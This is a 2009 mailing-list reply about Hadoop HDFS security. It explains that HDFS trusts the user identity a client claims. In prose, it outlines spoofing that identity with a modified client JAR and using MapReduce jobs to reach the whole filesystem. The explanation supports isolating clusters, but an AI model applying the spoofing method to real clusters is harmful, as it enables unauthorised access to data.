Re: ssh issues

Steve Loughran Tue, 26 May 2009 03:40:59 -0700

hmar...@umbc.edu wrote:

Steve,


Security through obscurity is always a good practice from a development
standpoint and one of the reasons why tricking you out is an easy task.


:)

My most recent presentation on HDFS clusters is now online, notice how it

doesn't gloss over the security:http://www.slideshare.net/steve_l/hdfs-issues

Please, keep hiding relevant details from people in order to keep everyone
smiling.

HDFS is as secure as NFS: you are trusted to be who you say you are.Which means that you have to run it on a secured subnet -accessrestricted to trusted hosts and/or one two front end servers or acceptthat your dataset is readable and writeable by anyone on the network.

There is user identification going in; it is currently at the levelwhere it will stop someone accidentally deleting the entire filesystemif they lack the rights. Which has been known to happen.

If the team looking after the cluster demand separate SSH keys/login forevery machine then not only are they making their operations costs high,once you have got the HDFS cluster and MR engine live, it's moot. Youcan push out work to the JobTracker, which then runs it on the machines,under whatever userid the TaskTrackers are running on. Now, 0.20+ willrun it under the identity of the user who claimed to be submitting thejob, but without that, your MR Jobs get the access rights to thefilesystem of the user that is running the TT, but it's fairlystraightforward to create a modified hadoop client JAR that doesn't callwhoami to get the userid, and instead spoofs to be anyone. Which meansthat even if you lock down the filesystem -no out of datacentre access-,if I can run my java code as MR jobs in your cluster, I can haveunrestricted access to the filesystem by way of the task tracker server.

But Hal, if you are running Ant for your build I'm running my code onyour machines anyway, so you had better be glad that I'm not malicious.


-Steve

Re: ssh issues

Reply via email to